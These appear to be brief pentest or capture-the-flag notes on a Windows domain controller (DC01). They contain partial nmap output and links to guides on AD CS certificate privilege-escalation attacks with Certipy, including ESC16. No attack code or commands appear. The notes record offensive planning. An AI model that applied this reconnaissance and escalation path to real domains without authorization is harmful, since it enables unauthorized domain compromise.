#Check BLOODHOUND DATA section again. 



9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  unknown
49685/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  unknown
49698/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  unknown
49730/tcp open  unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows


https://seriotonctf.github.io/2024/06/26/ADCS-Attacks-with-Certipy/index.html

https://medium.com/@muneebnawaz3849/ad-cs-esc16-misconfiguration-and-exploitation-9264e022a8c6

https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally